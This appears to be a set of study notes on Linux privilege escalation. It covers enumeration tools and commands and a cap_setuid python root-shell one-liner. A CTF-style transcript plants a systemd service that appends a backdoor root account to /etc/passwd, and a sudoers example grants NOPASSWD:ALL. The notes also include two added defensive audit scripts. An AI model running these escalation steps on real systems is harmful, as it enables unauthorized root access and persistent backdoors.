### 1. Information gathering suggester
#### Automated information-gathering tools
Listed in the order I prefer them, based on my own use:
- linpeas.sh [linpeas](https://github.com/carlospolop/PEASS-ng/releases/download/20220515/linpeas.sh)
- suid3num.py [suid3num](https://github.com/Anon-Exploiter/SUID3NUM)
- pspy [pspy](https://github.com/DominicBreuker/pspy)
- LinEnum.sh [LinEnum.sh](https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh)
- linux-smart-enumeration.sh [linux-smart-enumeration](https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh)
- linux-exploit-suggester.sh [les.sh](https://github.com/mzet-/linux-exploit-suggester)
- linux-exploit-suggester-2.pl [linux-exploit-suggester-2](https://github.com/jondonas/linux-exploit-suggester-2/blob/master/linux-exploit-suggester-2.pl)
- linuxprivchecker.py [linuxprivchecker](https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py)
#### Manual information gathering
```sh
# cron activity
grep "CRON" /var/log/cron.log
# file capabilities; python_cap: a python binary carrying cap_setuid
getcap -r / 2>/dev/null
/usr/bin/python2.7 -c 'import os; os.setuid(0); os.system("/bin/bash");'
# distribution and kernel version
cat /etc/issue
cat /proc/version
cat /etc/*-re*
cat /etc/cron*
uname -a
# filter the writable-file report (produced by the find in the section below), dropping /proc and /sys
grep -Ev '/proc|/sys' /tmp/report.txt
# filesystems and block devices
cat /etc/fstab
mount
lsblk
fdisk -l
parted -l
blkid
```
#### uid/suid privilege escalation
SUID binaries:
```
find / -perm -4000 -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2>/dev/null
find / -xdev -type f \( -perm -4000 -o -perm -2000 \) -ls
```
#### Privilege escalation via files writable/readable by the current user
```sh
find / -writable -type f 2>/dev/null >/tmp/report.txt
find / -user oscp 2>/dev/null
# replace .. with the user name of interest
find / -type f -user .. -readable 2>/dev/null
```
### Privilege escalation via services
#### Listing services
```
systemctl list-units --type=service
systemctl
service --status-all
```
#### Service
The unit file, placed at /dev/shm/root.service:
```ini
[Unit]
Description=pwned
[Service]
ExecStart=/dev/shm/root.sh
[Install]
WantedBy=multi-user.target
```
root.sh:
```
pepper@jarvis:/dev/shm$ nano root.sh
pepper@jarvis:/dev/shm$ chmod +x root.sh
pepper@jarvis:/dev/shm$ cat root.sh
#!/bin/bash
#password ->AAAA
echo 'rooot:gDlPrjU6SWeKo:0:0:root:/root:/bin/bash' >> /etc/passwd
pepper@jarvis:/dev/shm$ systemctl enable /dev/shm/root.service
```
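The service trick above leaves two things a defender can look for: a unit whose `ExecStart` points into a world-writable staging directory such as /dev/shm, and the `.wants` symlink that `systemctl enable /some/path` creates pointing outside the normal unit directories. The following audit script is an added example and is not part of the original notes; it assumes POSIX sh with sed, readlink and mktemp, and the prefix lists in it are constructed starting points rather than authoritative lists.

```shell
#!/bin/sh
# Added example (not from the original notes): audit systemd unit files for
# ExecStart targets in world-writable staging directories and for *.wants
# symlinks whose target lies outside the standard unit directories.
# Assumptions: POSIX sh, sed, readlink, mktemp. Prefix lists are constructed.

RISKY_PREFIXES="/dev/shm /tmp /var/tmp"
UNIT_DIRS="/etc/systemd/system /lib/systemd/system /usr/lib/systemd/system /run/systemd"

# Print the program path from the first ExecStart= line of a unit file.
# systemd allows a leading -, @, +, ! or : prefix on the path; strip it.
exec_start_path() {
    sed -n 's/^ExecStart=[-@+!:]*\([^ ]*\).*/\1/p' "$1" | head -n 1
}

# under_prefix PATH LIST: exit 0 when PATH lies under any prefix in LIST.
under_prefix() {
    for p in $2; do
        case "$1" in
            "$p"/*) return 0 ;;
        esac
    done
    return 1
}

# check_unit FILE: print one verdict line (RISKY / OK / NOEXEC); always exit 0.
check_unit() {
    target=$(exec_start_path "$1")
    if [ -z "$target" ]; then
        echo "NOEXEC $1"
    elif under_prefix "$target" "$RISKY_PREFIXES"; then
        echo "RISKY $1 -> ExecStart=$target is in a world-writable directory"
    else
        echo "OK $1 -> $target"
    fi
}

# check_wants DIR: inspect symlinks in a *.wants directory; print FOREIGN for
# links whose target is outside the standard unit directories.
check_wants() {
    for link in "$1"/*; do
        [ -L "$link" ] || continue
        dest=$(readlink "$link")
        if under_prefix "$dest" "$UNIT_DIRS"; then
            echo "OK $link -> $dest"
        else
            echo "FOREIGN $link -> $dest"
        fi
    done
}

# scan_units DIR...: check every *.service in DIR and every *.wants/ below it.
scan_units() {
    for dir in "$@"; do
        for f in "$dir"/*.service; do
            [ -f "$f" ] && check_unit "$f"
        done
        for w in "$dir"/*.wants; do
            [ -d "$w" ] && check_wants "$w"
        done
    done
    return 0
}

# demo: build a constructed unit tree in a temp dir and scan it.  On a real
# host the call would be: scan_units /etc/systemd/system
demo() {
    d=$(mktemp -d)
    printf '[Unit]\nDescription=pwned\n[Service]\nExecStart=/dev/shm/root.sh\n[Install]\nWantedBy=multi-user.target\n' > "$d/root.service"
    printf '[Unit]\nDescription=OpenSSH\n[Service]\nExecStart=/usr/sbin/sshd -D\n' > "$d/ssh.service"
    mkdir "$d/multi-user.target.wants"
    ln -s "$d/root.service" "$d/multi-user.target.wants/root.service"
    ln -s /usr/lib/systemd/system/ssh.service "$d/multi-user.target.wants/ssh.service"
    scan_units "$d"
    rm -rf "$d"
}
```

`demo` reproduces the layout from the notes (a unit in a temp directory standing in for /dev/shm, plus the enable symlink) and reports one RISKY and one FOREIGN line next to the two clean OpenSSH entries; pointing `scan_units` at /etc/systemd/system gives the same report for a live host.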
### Privilege escalation by writing to sudoers
```text
#
# This file MUST be edited with the 'visudo' command as root.
#
# Please consider adding local content in /etc/sudoers.d/ instead of
# directly modifying this file.
#
# See the man page for details on how to write a sudoers file.
#
Defaults env_reset
Defaults mail_badpass
Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
# Host alias specification
# User alias specification
# Cmnd alias specification
# User privilege specification
root ALL=(ALL:ALL) ALL
www-data ALL=(ALL:ALL) NOPASSWD:ALL
# Allow members of group sudo to execute any command
%sudo ALL=(ALL:ALL) ALL
# See sudoers(5) for more information on "@include" directives:
@includedir /etc/sudoers.d
```
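The `www-data ALL=(ALL:ALL) NOPASSWD:ALL` line above is the kind of entry a periodic sudoers audit should surface. The script below is an added example, not part of the original notes: it reports every principal other than root that may run ALL commands (HIGH when tagged NOPASSWD, MEDIUM otherwise), prints include directives so the included files get audited as well, and checks that the file is not group- or world-writable. It assumes POSIX sh, awk and find; the severity labels are this example's own convention.

```shell
#!/bin/sh
# Added example (not from the original notes): read-only audit of a sudoers
# file. Assumptions: POSIX sh, awk, find. Severity labels are constructed.

# audit_sudoers FILE: one report line per finding, written to stdout.
audit_sudoers() {
    awk '
        # skip blank lines and ordinary comments, but keep #include directives
        # (older sudo versions spell them with a leading #)
        /^[ \t]*$/ { next }
        /^[ \t]*#/ && !/^#include/ { next }
        /^Defaults/ { next }
        /^(User|Host|Cmnd|Runas)_Alias/ { next }
        /^[@#]includedir/ { print "INCLUDE dir " $2; next }
        /^[@#]include[ \t]/ { print "INCLUDE file " $2; next }
        {
            who = $1
            spec = $0
            sub(/^[^ \t]+[ \t]+/, "", spec)       # drop the user/group field
            # command part ends in ALL, optionally tagged NOPASSWD:
            if (who != "root" && spec ~ /[:=)][ \t]*(NOPASSWD:[ \t]*)?ALL[ \t]*$/) {
                if (spec ~ /NOPASSWD:/) sev = "HIGH"; else sev = "MEDIUM"
                print sev " " who " may run ALL commands: " $0
            }
        }' "$1"
}

# sudoers_writable FILE: print WRITABLE if group or others can write the file.
sudoers_writable() {
    if [ -n "$(find "$1" -prune \( -perm -g+w -o -perm -o+w \) -print)" ]; then
        echo "WRITABLE $1 (should be mode 0440, owned by root)"
    else
        echo "OK $1 permissions"
    fi
}

# demo: run the audit over a constructed copy of the sudoers shown above.
# On a real host: audit_sudoers /etc/sudoers; sudoers_writable /etc/sudoers
demo() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
Defaults env_reset
Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
root ALL=(ALL:ALL) ALL
www-data ALL=(ALL:ALL) NOPASSWD:ALL
# Allow members of group sudo to execute any command
%sudo ALL=(ALL:ALL) ALL
@includedir /etc/sudoers.d
EOF
    chmod 0440 "$f"
    audit_sudoers "$f"
    sudoers_writable "$f"
    rm -f "$f"
}
```

On the constructed file `demo` reports `HIGH www-data`, `MEDIUM %sudo` (the group entry is expected on most hosts but still worth listing), the /etc/sudoers.d include directory, and clean permissions; the root entry is not reported. Files under the include directory should be fed through `audit_sudoers` in turn.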
### Tool arsenal
#### sudo killer
[SUDO_KILLER](https://github.com/TH3xACE/SUDO_KILLER)
#### Kernel privilege escalation
```sh
uname -a
cat /etc/issue
cat /etc/*-re*
# then look up the kernel/distro version in exploit-db
searchsploit linux kernel ubuntu local privilege
```
[2 - Kernel privilege escalation + big CVE lookup table](2-内核提权+big%20cve%20对照表.md)
### Other
To be updated...
### Reference
[Linux Privilege Escalation Using PATH Variable - Hacking Articles](https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/)